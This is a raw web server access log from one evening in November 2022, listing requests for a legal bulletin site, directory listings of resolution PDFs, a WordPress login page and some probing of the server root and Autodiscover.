172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/img/textarea-br.png HTTP/1.1" 200 488
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/img/textarea-bl.png HTTP/1.1" 200 265
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1360
172.22.2.4 - - [07/Nov/2022:22:20:43 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [07/Nov/2022:22:20:43 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [07/Nov/2022:22:20:43 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [07/Nov/2022:22:20:43 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [07/Nov/2022:22:20:43 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [07/Nov/2022:22:20:43 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [07/Nov/2022:22:20:43 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [07/Nov/2022:22:20:43 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [07/Nov/2022:22:20:43 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [07/Nov/2022:22:20:43 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
186.30.101.68 - - [07/Nov/2022:22:20:46 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.30.101.68 - - [07/Nov/2022:22:20:47 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
186.30.101.68 - - [07/Nov/2022:22:20:47 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
186.30.101.68 - - [07/Nov/2022:22:20:47 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
186.30.101.68 - - [07/Nov/2022:22:20:47 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.30.101.68 - - [07/Nov/2022:22:20:51 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
186.30.101.68 - - [07/Nov/2022:22:20:51 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
186.30.101.68 - - [07/Nov/2022:22:20:51 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 330363
64.62.197.154 - - [07/Nov/2022:22:20:55 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
185.119.81.100 - - [07/Nov/2022:22:20:58 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [07/Nov/2022:22:20:59 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [07/Nov/2022:22:20:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
201.245.192.253 - - [07/Nov/2022:22:21:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43647
201.245.192.253 - - [07/Nov/2022:22:21:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42188
172.22.2.4 - - [07/Nov/2022:22:20:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
186.30.101.68 - - [07/Nov/2022:22:21:09 -0500] "GET /BLA/resoluciones/AUTOS%202022/2510.pdf HTTP/1.1" 200 547858
186.29.154.67 - - [07/Nov/2022:22:21:31 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 438883
152.89.196.211 - - [07/Nov/2022:22:21:44 -0500] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 1018
186.30.101.68 - - [07/Nov/2022:22:21:59 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2012%2F HTTP/1.1" 200 274522
186.30.101.68 - - [07/Nov/2022:22:22:15 -0500] "GET /BLA/resoluciones/AUTOS%202012/2510.pdf HTTP/1.1" 200 3057945
172.22.2.4 - - [07/Nov/2022:22:21:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
43.131.66.209 - - [07/Nov/2022:22:23:18 -0500] "\x16\x03\x01" 400 226
209.141.36.231 - - [07/Nov/2022:22:23:34 -0500] "GET / HTTP/1.1" 200 319
209.141.36.231 - - [07/Nov/2022:22:23:35 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
209.141.34.187 - - [07/Nov/2022:22:23:36 -0500] "GET / HTTP/1.1" 200 319
209.141.55.120 - - [07/Nov/2022:22:23:36 -0500] "GET / HTTP/1.1" 200 4720
209.141.34.187 - - [07/Nov/2022:22:23:36 -0500] "GET / HTTP/1.1" 200 319
209.141.34.187 - - [07/Nov/2022:22:23:36 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
209.141.55.120 - - [07/Nov/2022:22:23:37 -0500] "GET /favicon.ico HTTP/1.1" 404 1034
209.141.34.187 - - [07/Nov/2022:22:23:37 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
205.185.116.25 - - [07/Nov/2022:22:23:43 -0500] "GET / HTTP/1.1" 200 319
